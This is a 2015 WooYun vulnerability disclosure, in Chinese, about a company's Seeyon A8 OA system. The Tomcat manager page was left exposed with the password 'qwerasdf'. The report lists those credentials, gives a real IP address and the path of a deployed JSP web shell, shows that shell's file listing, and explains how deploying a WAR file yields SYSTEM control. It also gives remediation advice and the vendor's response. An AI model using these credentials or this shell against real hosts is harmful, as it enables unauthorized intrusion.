漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0130620
漏洞标题:西安协力协同TOMCAT配置不当,导致系统全面沦陷
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-08-02 22:42
修复时间:2015-09-19 10:32
公开时间:2015-09-19 10:32
漏洞类型:服务弱口令
危害等级:高
自评Rank:12
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-02: 细节已通知厂商并且等待厂商处理中
2015-08-05: 厂商已经确认,细节仅向厂商公开
2015-08-15: 细节向核心白帽子及相关领域专家公开
2015-08-25: 细节向普通白帽子公开
2015-09-04: 细节向实习白帽子公开
2015-09-19: 细节向公众公开
简要描述:
由于该公司协同OA平台采用用友A8产品,默认部署,没有禁用TOMCAT的manager页面,而且使用了键盘序做为密码,导致过以远远程部署木马应用,导致系统全面沦陷。
详细说明:
使用了用友(seeyou)和密码(qwerasdf)作为manager的管理密码, <user username="seeyon" password="qwerasdf" roles="tomcat,role1,manager"/>
通过把jsp(打包成war)上传部署,就可获取控制权,而且由于java部署一般皆为system,导致木马也为system,危害较大。
漏洞证明:
http://113.140.65.50:8000/a8file/a8file.jsp
File Management
Command Window
System Property
Help
funny john
Current Folder: f:\UFSeeyon\A8\Enterprise\ApacheJetspeed Drivers : C:\ D:\ E:\ F:\ G:\
Parent Folder
- - - - - - - - - - -
bin
common
conf
logs
server
shared
temp
webapps
work
File Name File Size Last Modified Operations
LICENSE 40.27 KB 2013-3-10 15:12:46 Edit Delete Download Move
NOTICE 773 Bytes 2013-3-10 15:12:46 Edit Delete Download Move
RELEASE-NOTES 7.51 KB 2013-3-10 15:12:46 Edit Delete Download Move
RUNNING.txt 8.5 KB 2013-3-10 15:12:46 Edit Delete Download Move
修复方案:
1,删除manager管理后台或禁止登陆
2,修改manager管理密码
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2015-08-05 10:31
厂商回复:
CNVD确认所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。
最新状态:
暂无